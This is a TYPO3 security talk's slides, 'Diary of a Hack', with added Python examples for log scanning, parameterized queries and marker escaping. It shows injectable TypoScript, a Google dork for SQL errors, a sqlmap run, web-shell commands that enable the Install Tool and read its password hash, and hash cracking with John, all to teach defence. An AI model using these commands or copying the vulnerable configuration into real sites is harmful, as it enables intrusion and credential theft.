Inspiring people to share
TYPO3 Developer Days 2015
Security Forensics
Helmut Hummel <typo3@helhum.io>
17.07.2015
#CertiFUNcation - Brühl 2015
Secure TYPO3

Agenda
• Diary of a Hack
• Pitfalls
• Best Practice
Diary of a Hack

Day 1 - Implementing a feature
lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where.wrap = colPos=|
  select.where.data = GP:colPos
}
lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where.wrap = header like '%|%'
  select.where.data = GP:search
}
Day 2 - Testing the feature
'BE/debug' => '1'
'FE/debug' => '1'
'SYS/devIPmask' => '*'
'SYS/displayErrors' => '1'
'SYS/sqlDebug' => '1'
'SYS/exceptionalErrors' => '28674'
'DB/username' => 'root'
Day 3 - Distraction

Day 4 - Attraction
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Day 5 - Exploitation

Disclaimer
Don’t do this at home!
$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'

GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL
http://security.dev/typo3/sysext/install/Start/Install.php
http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
$ john pw
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
password         (dummy)
guesses: 1  time: 0:00:00:01 DONE (Thu Jun  4 11:00:44 2015)  c/s: 900  trying: 123456 - fishing
Day 5 - Discovery

Discovery
• Take site offline!
• seriously
• I mean it
Day 6 - Analysis

Analysis
• Make a backup of current state (files, DB)
• Search all logs for "suspicious" entries
• Try to reproduce assumed entry points
• If in doubt: get help
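The "search all logs for suspicious entries" step, made concrete. This is an added example and not part of the talk: a small Python scanner over constructed Apache combined-format access-log lines that carry the traces the diary describes (sqlmap's User-Agent, a 5xx answer to a request with a quote in a parameter, the request that creates typo3conf/ENABLE_INSTALL_TOOL through a .php file taking a cmd parameter, and a direct Install Tool access). The log lines, the client addresses and the rule set are constructed for the example; the file name tmpbrsru.php is reused from the slides. Tune the rules to your own site layout before running it over real logs.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format, modelled on the
# requests shown in the Diary of a Hack. Not real log data.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jun/2015:10:58:01 +0200] "GET /insecurity/?colPos=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2015:10:58:02 +0200] "GET /insecurity/?colPos=0%27 HTTP/1.1" 500 812 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.5 - - [04/Jun/2015:10:59:40 +0200] "GET /tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2015:10:59:45 +0200] "GET /typo3/sysext/install/Start/Install.php HTTP/1.1" 200 9011 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jun/2015:11:00:03 +0200] "GET /index.php?id=1 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of reasons an entry looks suspicious (empty if none)."""
    reasons = []
    target = unquote(entry["target"])          # decode %27, %20 etc. before matching
    path, _, query = target.partition("?")
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap user agent")
    if entry["status"].startswith("5") and "'" in query:
        reasons.append("server error on a quoted parameter (SQL error disclosure?)")
    if "ENABLE_INSTALL_TOOL" in target:
        reasons.append("attempt to enable the Install Tool")
    if (path.endswith(".php") and not path.startswith("/typo3/")
            and path != "/index.php" and "cmd=" in query):
        reasons.append("unknown PHP file taking a cmd parameter (web shell?)")
    if path.startswith("/typo3/sysext/install/"):
        reasons.append("Install Tool access")
    return reasons


def scan(log_text):
    """Return (line_no, client_ip, reasons) for every suspicious line."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue                            # unparseable lines are skipped, not flagged
        reasons = classify(entry)
        if reasons:
            findings.append((no, entry["ip"], reasons))
    return findings


def suspicious_ips(findings):
    """Count flagged requests per client address; the top entries are where to start."""
    return Counter(ip for _, ip, _ in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for no, ip, reasons in hits:
        print(f"line {no} {ip}: {'; '.join(reasons)}")
    print(suspicious_ips(hits))
```

Once an address is flagged, pull every request from it (not just the flagged ones) and walk the timeline; the probe, the error page and the file drop are minutes apart in the constructed sample, which is also how it looks in practice.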
Day 7 - Fix
lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where = colPos=###colPos###
  select.markers {
    colPos.data = GP:colPos
  }
}
lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where = header like ###search###
  select.markers {
    search.data = GP:search
    search.wrap = %|%
  }
}
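Why the Day 1 TypoScript is injectable and the Day 7 version is not, as an added example that is not part of the talk or of TYPO3. The table is an in-memory SQLite stand-in for tt_content with constructed rows. TYPO3 quotes marker values through its database layer before they replace ###colPos### and ###search###; the example models that with bound parameters, which give the same guarantee (the value is never parsed as SQL). That equivalence is the example's assumption, not TYPO3 code.

```python
import sqlite3

# Constructed rows standing in for tt_content (uid, colPos, header); not real TYPO3 data.
SAMPLE_ROWS = [
    (1, 0, "Welcome"),
    (2, 0, "Team"),
    (3, 1, "Teaser"),
]


def make_db():
    """In-memory stand-in for the table the TypoScript on the slides queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tt_content (uid INTEGER, colPos INTEGER, header TEXT)")
    conn.executemany("INSERT INTO tt_content VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


# Day 1: select.where.wrap = colPos=| with select.where.data = GP:colPos
# amounts to pasting the GET value straight into the WHERE clause.
def vulnerable_by_colpos(conn, colpos):
    sql = "SELECT uid FROM tt_content WHERE colPos=" + colpos + " ORDER BY uid"
    return [row[0] for row in conn.execute(sql)]


# Day 1: select.where.wrap = header like '%|%' puts the raw GP:search value inside the quotes.
def vulnerable_search(conn, search):
    sql = "SELECT uid FROM tt_content WHERE header like '%" + search + "%' ORDER BY uid"
    return [row[0] for row in conn.execute(sql)]


# Day 7: with select.markers the value is quoted before it replaces ###colPos###.
# Modelled here with a bound parameter (assumption: same guarantee as TYPO3's quoting).
def hardened_by_colpos(conn, colpos):
    sql = "SELECT uid FROM tt_content WHERE colPos=? ORDER BY uid"
    return [row[0] for row in conn.execute(sql, (colpos,))]


# Day 7: search.wrap = %|% is applied to the value first, then the whole value is quoted.
def hardened_search(conn, search):
    sql = "SELECT uid FROM tt_content WHERE header like ? ORDER BY uid"
    return [row[0] for row in conn.execute(sql, ("%" + search + "%",))]


def demo():
    """Run both versions against normal and hostile input; returns a dict of results."""
    conn = make_db()
    results = {
        "vuln_normal": vulnerable_by_colpos(conn, "0"),
        "vuln_injected": vulnerable_by_colpos(conn, "0 OR 1=1"),   # extra rows: injection
        "hard_normal": hardened_by_colpos(conn, "0"),
        "hard_injected": hardened_by_colpos(conn, "0 OR 1=1"),     # treated as a literal
        "hard_search": hardened_search(conn, "Tea"),
        "hard_quote": hardened_search(conn, "O'Reilly"),           # quote is just data
    }
    # A plain quote in the search term: the Day 4 "You have an error in your SQL syntax"
    # page Google indexed comes from exactly this kind of broken query.
    try:
        vulnerable_search(conn, "O'Reilly")
        results["vuln_quote"] = "ok"
    except sqlite3.OperationalError:
        results["vuln_quote"] = "syntax error"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The second lesson is in the "vuln_quote" result: a user typing an apostrophe into the search box is enough to produce the SQL error page, and with SYS/displayErrors and SYS/sqlDebug left on (Day 2) that page tells the world which query to attack.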
Fix
• Close security issue in Code/Extension/Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
Thank you! @helhum
http://insight.helhum.io
typo3@helhum.io
Further Pitfalls
Types of Security Threats
• Information disclosure
• SQL injection
• Cross Site Scripting (XSS)
• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html
• https://www.owasp.org/index.php/Category:Attack
TypoScript

page.10 = TEXT
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
page.10.insertData = 1

page.10 = TEXT
# title can contain: {DB:be_users:1:password}
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
page.10.insertData = 1

page.10 = TEXT
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

page.10 = TEXT
# title can contain HTML
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

page.10 = TEXT
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1

page.10 = TEXT
# Avoid dataWrap or insertData if possible
# layout field might not be safe
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1
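A model of the three stdWrap steps the slides above play with (insertData, dataWrap, htmlSpecialChars), added here as an example and not code from TYPO3 or from the talk. The marker resolver, the record dict and the FAKE_DB lookup are constructed stand-ins for TYPO3's getData(); only the two marker forms on the slides are understood. What the model reproduces is the order TYPO3 applies the steps in: htmlSpecialChars escapes the field value, dataWrap expands markers only in the wrap string, insertData expands them over the whole output including the title, and nothing escapes what {field:layout} writes into the class attribute.

```python
import html
import re

# Constructed stand-in for a database lookup; the value is a placeholder, not a real hash.
FAKE_DB = {("be_users", "1", "password"): "$P$placeholder-hash"}

# Markers of the form {type:argument}, the shape used on the slides ({field:layout}, {DB:...}).
MARKER_RE = re.compile(r"\{(\w+):([^}]*)\}")


def get_data(kind, args, record):
    """Tiny model of getData(): only the two marker types used on the slides are supported."""
    if kind == "field":
        return record.get(args, "")
    if kind == "DB":
        table, uid, field = args.split(":")
        return FAKE_DB.get((table, uid, field), "")
    return ""


def insert_data(text, record):
    """Expand every {type:argument} marker in text."""
    return MARKER_RE.sub(lambda m: get_data(m.group(1), m.group(2), record), text)


def render_insertdata(record):
    """field + wrap + insertData = 1: markers are expanded over the whole output,
    i.e. over the untrusted title as well as over the wrap."""
    wrapped = '<h1 class="c-{field:layout}">' + record["title"] + "</h1>"
    return insert_data(wrapped, record)


def render_datawrap(record, html_special_chars=False):
    """field (+ htmlSpecialChars = 1) + dataWrap: markers are expanded only in the
    wrap string, and the field value is escaped before it is inserted."""
    value = record["title"]
    if html_special_chars:
        value = html.escape(value, quote=True)
    wrap = insert_data('<h1 class="c-{field:layout}">|</h1>', record)
    return wrap.replace("|", value, 1)


if __name__ == "__main__":
    leak = {"title": "{DB:be_users:1:password}", "layout": "default"}
    print(render_insertdata(leak))                        # title marker expanded: disclosure
    print(render_datawrap(leak))                          # marker stays literal text
    markup = {"title": "<b>Hi</b>", "layout": "default"}
    print(render_datawrap(markup))                        # raw HTML from the title
    print(render_datawrap(markup, html_special_chars=True))
    layout = {"title": "Hi", "layout": 'a"b'}
    print(render_datawrap(layout, html_special_chars=True))  # quote in layout is not escaped
```

The last call is the slide's closing caveat in code: htmlSpecialChars = 1 protects the title, but the layout value goes through the wrap unescaped, so the field feeding {field:layout} has to be trusted (or restricted to a fixed set of values in TCA) on its own.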
Fluid
Extbase

XSS even when using Fluid
• Flash Messages
• HTML Context
• Custom View Helpers
Best Practice
• Defined Process
• Regular updates
• Backups
• Monitoring
• Education
• Reserve time for all of the above
• More in: http://docs.typo3.org/typo3cms/SecurityGuide/
Questions?
Secure TYPO3 - Diary of a Hack

Resources
• http://sqlmap.org
• http://www.openwall.com/john/
• http://docs.typo3.org/typo3cms/SecurityGuide/
• https://www.owasp.org/